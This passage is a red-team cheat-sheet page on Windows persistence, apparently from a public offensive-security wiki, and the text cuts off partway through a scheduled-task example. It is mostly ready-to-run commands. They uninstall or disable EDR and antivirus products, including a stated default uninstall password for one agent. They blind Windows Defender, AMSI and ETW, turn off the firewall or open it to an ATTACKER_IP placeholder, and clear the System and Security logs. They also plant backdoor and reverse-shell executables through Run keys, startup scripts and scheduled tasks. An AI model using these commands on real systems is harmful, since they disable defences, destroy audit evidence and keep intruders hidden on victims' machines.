LAPS Persistence
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/redteam/persistence/windows-persistence.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/InternalAllTheThings/raw/main/docs/redteam/persistence/windows-persistence.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="windows-persistence">Windows - Persistence</h1>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#tools">Tools</a></li>
<li><a href="#hide-your-binary">Hide Your Binary</a></li>
<li><a href="#disable-antivirus-and-security">Disable Antivirus and Security</a><ul>
<li><a href="#antivirus-removal">Antivirus Removal</a></li>
<li><a href="#disable-windows-defender">Disable Windows Defender</a></li>
<li><a href="#disable-windows-firewall">Disable Windows Firewall</a></li>
<li><a href="#clear-system-and-security-logs">Clear System and Security Logs</a></li>
</ul>
</li>
<li><a href="#simple-user">Simple User</a><ul>
<li><a href="#registry-hkcu">Registry HKCU</a></li>
<li><a href="#startup">Startup</a></li>
<li><a href="#scheduled-tasks-user">Scheduled Tasks User</a></li>
<li><a href="#bits-jobs">BITS Jobs</a></li>
</ul>
</li>
<li><a href="#serviceland">Serviceland</a><ul>
<li><a href="#iis">IIS</a></li>
<li><a href="#windows-service">Windows Service</a></li>
</ul>
</li>
<li><a href="#elevated">Elevated</a><ul>
<li><a href="#registry-hklm">Registry HKLM</a><ul>
<li><a href="#winlogon-helper-dll">Winlogon Helper DLL</a></li>
<li><a href="#globalflag">GlobalFlag</a></li>
</ul>
</li>
<li><a href="#startup-elevated">Startup Elevated</a></li>
<li><a href="#services-elevated">Services Elevated</a></li>
<li><a href="#servicesecuritydescriptor">Service Security Descriptor</a></li>
<li><a href="#scheduled-tasks-elevated">Scheduled Tasks Elevated</a></li>
<li><a href="#binary-replacement">Binary Replacement</a><ul>
<li><a href="#binary-replacement-on-windows-xp">Binary Replacement on Windows XP+</a></li>
<li><a href="#binary-replacement-on-windows-10">Binary Replacement on Windows 10+</a></li>
</ul>
</li>
<li><a href="#skeleton-key">Skeleton Key</a></li>
<li><a href="#virtual-machines">Virtual Machines</a></li>
<li><a href="#windows-subsystem-for-linux">Windows Subsystem for Linux</a></li>
</ul>
</li>
<li><a href="#domain">Domain</a><ul>
<li><a href="#golden-certificate">Golden Certificate</a></li>
<li><a href="#golden-ticket">Golden Ticket</a></li>
</ul>
</li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/fireeye/SharPersist">SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r</a></li>
</ul>
<h2 id="hide-your-binary">Hide Your Binary</h2>
<blockquote>
<p>Sets (+) or clears (-) the Hidden file attribute. If a file uses this attribute set, you must clear the attribute before you can change any other attributes for the file.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">PS</span><span class="p">&gt;</span> <span class="n">attrib</span> <span class="p">+</span><span class="nb">h </span><span class="n">mimikatz</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<h2 id="disable-antivirus-and-security">Disable Antivirus and Security</h2>
<h3 id="antivirus-removal">Antivirus Removal</h3>
<ul>
<li><a href="https://github.com/ayeskatalas/Sophos-Removal-Tool/">Sophos Removal Tool.ps1</a></li>
<li><a href="https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html">Symantec CleanWipe</a></li>
<li><a href="https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html">Elastic EDR/Security</a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="nb">cd </span><span class="s2">&quot;C:\Program Files\Elastic\Agent\&quot;</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\</span><span class="n">Program</span> <span class="n">Files</span><span class="p">\</span><span class="n">Elastic</span><span class="p">\</span><span class="n">Agent</span><span class="p">&gt;</span> <span class="p">.\</span><span class="n">elastic-agent</span><span class="p">.</span><span class="n">exe</span> <span class="n">uninstall</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="n">Elastic</span> <span class="n">Agent</span> <span class="n">will</span> <span class="n">be</span> <span class="n">uninstalled</span> <span class="n">from</span> <span class="n">your</span> <span class="n">system</span> <span class="n">at</span> <span class="n">C</span><span class="p">:\</span><span class="n">Program</span> <span class="n">Files</span><span class="p">\</span><span class="n">Elastic</span><span class="p">\</span><span class="n">Agent</span><span class="p">.</span> <span class="k">Do</span> <span class="n">you</span> <span class="n">want</span> <span class="n">to</span> <span class="k">continue</span><span class="p">?</span> <span class="p">[</span><span class="n">Y</span><span class="p">/</span><span class="n">n</span><span class="p">]:</span><span class="n">Y</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="n">Elastic</span> <span class="n">Agent</span> <span class="n">has</span> <span class="n">been</span> <span class="n">uninstalled</span><span class="p">.</span>
</code></pre></div></li>
<li><a href="https://mrd0x.com/cortex-xdr-analysis-and-bypass/">Cortex XDR</a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="c"># Global uninstall password: Password1</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="n">Password</span> <span class="n">hash</span> <span class="n">is</span> <span class="n">located</span> <span class="k">in</span> <span class="n">C</span><span class="p">:\</span><span class="n">ProgramData</span><span class="p">\</span><span class="n">Cyvera</span><span class="p">\</span><span class="n">LocalSystem</span><span class="p">\</span><span class="n">Persistence</span><span class="p">\</span><span class="n">agent_settings</span><span class="p">.</span><span class="n">db</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="n">Look</span> <span class="k">for</span> <span class="n">PasswordHash</span><span class="p">,</span> <span class="n">PasswordSalt</span> <span class="n">or</span> <span class="n">password</span><span class="p">,</span> <span class="n">salt</span> <span class="n">strings</span><span class="p">.</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="c"># Disable Cortex: Change the DLL to a random value, then REBOOT</span>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="n">reg</span> <span class="n">add</span> <span class="n">HKEY_LOCAL_MACHINE</span><span class="p">\</span><span class="n">SYSTEM</span><span class="p">\</span><span class="n">CurrentControlSet</span><span class="p">\</span><span class="n">Services</span><span class="p">\</span><span class="n">CryptSvc</span><span class="p">\</span><span class="n">Parameters</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_EXPAND_SZ</span> <span class="p">/</span><span class="n">v</span> <span class="n">ServiceDll</span> <span class="p">/</span><span class="n">d</span> <span class="n">nothing</span><span class="p">.</span><span class="n">dll</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a>
<a id="__codelineno-2-8" name="__codelineno-2-8" href="#__codelineno-2-8"></a><span class="c"># Disables the agent on startup (requires reboot to work)</span>
<a id="__codelineno-2-9" name="__codelineno-2-9" href="#__codelineno-2-9"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">startup</span> <span class="n">disable</span>
<a id="__codelineno-2-10" name="__codelineno-2-10" href="#__codelineno-2-10"></a>
<a id="__codelineno-2-11" name="__codelineno-2-11" href="#__codelineno-2-11"></a><span class="c"># Disables protection on Cortex XDR files, processes, registry and services</span>
<a id="__codelineno-2-12" name="__codelineno-2-12" href="#__codelineno-2-12"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">protect</span> <span class="n">disable</span>
<a id="__codelineno-2-13" name="__codelineno-2-13" href="#__codelineno-2-13"></a>
<a id="__codelineno-2-14" name="__codelineno-2-14" href="#__codelineno-2-14"></a><span class="c"># Disables Cortex XDR (Even with tamper protection enabled)</span>
<a id="__codelineno-2-15" name="__codelineno-2-15" href="#__codelineno-2-15"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">runtime</span> <span class="n">disable</span>
<a id="__codelineno-2-16" name="__codelineno-2-16" href="#__codelineno-2-16"></a>
<a id="__codelineno-2-17" name="__codelineno-2-17" href="#__codelineno-2-17"></a><span class="c"># Disables event collection</span>
<a id="__codelineno-2-18" name="__codelineno-2-18" href="#__codelineno-2-18"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">event_collection</span> <span class="n">disable</span>
</code></pre></div></li>
</ul>
<h3 id="disable-windows-defender">Disable Windows Defender</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="c"># Disable Defender</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="nb">sc </span><span class="n">config</span> <span class="n">WinDefend</span> <span class="n">start</span><span class="p">=</span> <span class="n">disabled</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="nb">sc </span><span class="n">stop</span> <span class="n">WinDefend</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="nb">Set-MpPreference</span> <span class="n">-DisableRealtimeMonitoring</span> <span class="nv">$true</span>
<a id="__codelineno-3-5" name="__codelineno-3-5" href="#__codelineno-3-5"></a>
<a id="__codelineno-3-6" name="__codelineno-3-6" href="#__codelineno-3-6"></a><span class="c">## Exclude a process / location</span>
<a id="__codelineno-3-7" name="__codelineno-3-7" href="#__codelineno-3-7"></a><span class="nb">Set-MpPreference</span> <span class="n">-ExclusionProcess</span> <span class="s2">&quot;word.exe&quot;</span><span class="p">,</span> <span class="s2">&quot;vmwp.exe&quot;</span>
<a id="__codelineno-3-8" name="__codelineno-3-8" href="#__codelineno-3-8"></a><span class="nb">Add-MpPreference</span> <span class="n">-ExclusionProcess</span> <span class="s1">&#39;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&#39;</span>
<a id="__codelineno-3-9" name="__codelineno-3-9" href="#__codelineno-3-9"></a><span class="nb">Add-MpPreference</span> <span class="n">-ExclusionPath</span> <span class="n">C</span><span class="p">:\</span><span class="n">Video</span><span class="p">,</span> <span class="n">C</span><span class="p">:\</span><span class="n">install</span>
<a id="__codelineno-3-10" name="__codelineno-3-10" href="#__codelineno-3-10"></a>
<a id="__codelineno-3-11" name="__codelineno-3-11" href="#__codelineno-3-11"></a><span class="c"># Disable scanning all downloaded files and attachments, disable AMSI (reactive)</span>
<a id="__codelineno-3-12" name="__codelineno-3-12" href="#__codelineno-3-12"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Set-MpPreference</span> <span class="n">-DisableRealtimeMonitoring</span> <span class="nv">$true</span><span class="p">;</span> <span class="nb">Get-MpComputerStatus</span>
<a id="__codelineno-3-13" name="__codelineno-3-13" href="#__codelineno-3-13"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Set-MpPreference</span> <span class="n">-DisableIOAVProtection</span> <span class="nv">$true</span>
<a id="__codelineno-3-14" name="__codelineno-3-14" href="#__codelineno-3-14"></a><span class="c"># Disable AMSI (set to 0 to enable)</span>
<a id="__codelineno-3-15" name="__codelineno-3-15" href="#__codelineno-3-15"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Set-MpPreference</span> <span class="n">-DisableScriptScanning</span> <span class="n">1</span>
<a id="__codelineno-3-16" name="__codelineno-3-16" href="#__codelineno-3-16"></a>
<a id="__codelineno-3-17" name="__codelineno-3-17" href="#__codelineno-3-17"></a><span class="c"># Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions</span>
<a id="__codelineno-3-18" name="__codelineno-3-18" href="#__codelineno-3-18"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;Start&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;0&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-19" name="__codelineno-3-19" href="#__codelineno-3-19"></a>
<a id="__codelineno-3-20" name="__codelineno-3-20" href="#__codelineno-3-20"></a><span class="c"># Wipe currently stored definitions</span>
<a id="__codelineno-3-21" name="__codelineno-3-21" href="#__codelineno-3-21"></a><span class="c"># Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\&lt;antimalware platform version&gt;</span>
<a id="__codelineno-3-22" name="__codelineno-3-22" href="#__codelineno-3-22"></a><span class="n">MpCmdRun</span><span class="p">.</span><span class="n">exe</span> <span class="n">-RemoveDefinitions</span> <span class="n">-All</span>
<a id="__codelineno-3-23" name="__codelineno-3-23" href="#__codelineno-3-23"></a>
<a id="__codelineno-3-24" name="__codelineno-3-24" href="#__codelineno-3-24"></a><span class="c"># Remove signatures (if Internet connection is present, they will be downloaded again):</span>
<a id="__codelineno-3-25" name="__codelineno-3-25" href="#__codelineno-3-25"></a><span class="nb">PS </span><span class="p">&gt;</span> <span class="p">&amp;</span> <span class="s2">&quot;C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe&quot;</span> <span class="n">-RemoveDefinitions</span> <span class="n">-All</span>
<a id="__codelineno-3-26" name="__codelineno-3-26" href="#__codelineno-3-26"></a><span class="nb">PS </span><span class="p">&gt;</span> <span class="p">&amp;</span> <span class="s2">&quot;C:\Program Files\Windows Defender\MpCmdRun.exe&quot;</span> <span class="n">-RemoveDefinitions</span> <span class="n">-All</span>
<a id="__codelineno-3-27" name="__codelineno-3-27" href="#__codelineno-3-27"></a>
<a id="__codelineno-3-28" name="__codelineno-3-28" href="#__codelineno-3-28"></a><span class="c"># Disable Windows Defender Security Center</span>
<a id="__codelineno-3-29" name="__codelineno-3-29" href="#__codelineno-3-29"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\System\CurrentControlSet\Services\SecurityHealthService&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;Start&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;4&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-30" name="__codelineno-3-30" href="#__codelineno-3-30"></a>
<a id="__codelineno-3-31" name="__codelineno-3-31" href="#__codelineno-3-31"></a><span class="c"># Disable Real Time Protection</span>
<a id="__codelineno-3-32" name="__codelineno-3-32" href="#__codelineno-3-32"></a><span class="n">reg</span> <span class="n">delete</span> <span class="s2">&quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-33" name="__codelineno-3-33" href="#__codelineno-3-33"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;DisableAntiSpyware&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;1&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-34" name="__codelineno-3-34" href="#__codelineno-3-34"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;DisableAntiVirus&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;1&quot;</span> <span class="p">/</span><span class="n">f</span>
</code></pre></div>
<h3 id="disable-windows-firewall">Disable Windows Firewall</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="n">Netsh</span> <span class="n">Advfirewall</span> <span class="n">show</span> <span class="n">allprofiles</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="n">NetSh</span> <span class="n">Advfirewall</span> <span class="nb">set </span><span class="n">allprofiles</span> <span class="n">state</span> <span class="n">off</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="c"># ip whitelisting</span>
<a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a><span class="nb">New-NetFirewallRule</span> <span class="n">-Name</span> <span class="n">morph3inbound</span> <span class="n">-DisplayName</span> <span class="n">morph3inbound</span> <span class="n">-Enabled</span> <span class="n">True</span> <span class="n">-Direction</span> <span class="n">Inbound</span> <span class="n">-Protocol</span> <span class="n">ANY</span> <span class="n">-Action</span> <span class="n">Allow</span> <span class="n">-Profile</span> <span class="n">ANY</span> <span class="n">-RemoteAddress</span> <span class="n">ATTACKER_IP</span>
</code></pre></div>
<h3 id="clear-system-and-security-logs">Clear System and Security Logs</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="n">cmd</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">c</span> <span class="n">wevtutil</span><span class="p">.</span><span class="n">exe</span> <span class="n">cl</span> <span class="n">System</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="n">cmd</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">c</span> <span class="n">wevtutil</span><span class="p">.</span><span class="n">exe</span> <span class="n">cl</span> <span class="n">Security</span>
</code></pre></div>
<h2 id="simple-user">Simple User</h2>
<p>Set a file as hidden</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="n">attrib</span> <span class="p">+</span><span class="nb">h </span><span class="n">c</span><span class="p">:\</span><span class="n">autoexec</span><span class="p">.</span><span class="n">bat</span>
</code></pre></div>
<h3 id="registry-hkcu">Registry HKCU</h3>
<p>Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="n">Value</span> <span class="n">name</span><span class="p">:</span> <span class="n">Backdoor</span>
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="n">Value</span> <span class="n">data</span><span class="p">:</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">Rasta</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<p>Using the command line </p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
</code></pre></div>
<p>Using SharPersist</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">reg</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-k</span> <span class="s2">&quot;hkcurun&quot;</span> <span class="n">-v</span> <span class="s2">&quot;Test Stuff&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">reg</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-k</span> <span class="s2">&quot;hkcurun&quot;</span> <span class="n">-v</span> <span class="s2">&quot;Test Stuff&quot;</span> <span class="n">-m</span> <span class="n">add</span> <span class="n">-o</span> <span class="n">env</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">reg</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-k</span> <span class="s2">&quot;logonscript&quot;</span> <span class="n">-m</span> <span class="n">add</span>
</code></pre></div>
<h3 id="startup">Startup</h3>
<p>Create a batch script in the user startup folder.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">gc </span><span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">Rasta</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Roaming</span><span class="p">\</span><span class="n">Microsoft</span><span class="p">\</span><span class="n">Windows</span><span class="p">\</span><span class="nb">Start </span><span class="n">Menu</span><span class="p">\</span><span class="n">Programs</span><span class="p">\</span><span class="n">Startup</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">bat</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="nb">start </span><span class="p">/</span><span class="n">b</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">Rasta</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<p>Using SharPersist</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">startupfolder</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="o">-f</span> <span class="s2">&quot;Some File&quot;</span> <span class="n">-m</span> <span class="n">add</span>
</code></pre></div>
<h3 id="scheduled-tasks-user">Scheduled Tasks User</h3>
<ul>
<li>Using native <strong>schtask</strong> - Create a new task
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="c"># Create the scheduled tasks to run once at 00.00</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="nb">sc </span><span class="n">ONCE</span> <span class="p">/</span><span class="n">st</span> <span class="n">00</span><span class="p">:</span><span class="n">00</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;Device-Synchronize&quot;</span> <span class="p">/</span><span class="n">tr</span> <span class="n">C</span><span class="p">:\</span><span class="n">Temp</span><span class="p">\</span><span class="n">revshell</span><span class="p">.</span><span class="n">exe</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="c"># Force run it now !</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">run</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;Device-Synchronize&quot;</span>
</code></pre></div></li>
<li>
<p>Using native <strong>schtask</strong> - Leverage the <code>schtasks /change</code> command to modify existing scheduled tasks
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="c"># Launch an executable by calling the ShellExec_RunDLL function.</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="n">SCHTASKS</span> <span class="p">/</span><span class="n">Change</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;\Microsoft\Windows\PLA\Server Manager Performance Monitor&quot;</span> <span class="p">/</span><span class="n">TR</span> <span class="s2">&quot;C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat&quot;</span> <span class="p">/</span><span class="n">RL</span> <span class="n">HIGHEST</span> <span class="p">/</span><span class="n">RU</span> <span class="s2">&quot;&quot;</span> <span class="p">/</span><span class="n">ENABLE</span>
</code></pre></div></p>
</li>
<li>
<p>Using Powershell
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$A</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskAction</span> <span class="n">-Execute</span> <span class="s2">&quot;cmd.exe&quot;</span> <span class="n">-Argument</span> <span class="s2">&quot;/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe&quot;</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$T</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskTrigger</span> <span class="n">-AtLogOn</span> <span class="n">-User</span> <span class="s2">&quot;Rasta&quot;</span>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$P</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskPrincipal</span> <span class="s2">&quot;Rasta&quot;</span>
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$S</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskSettingsSet</span>
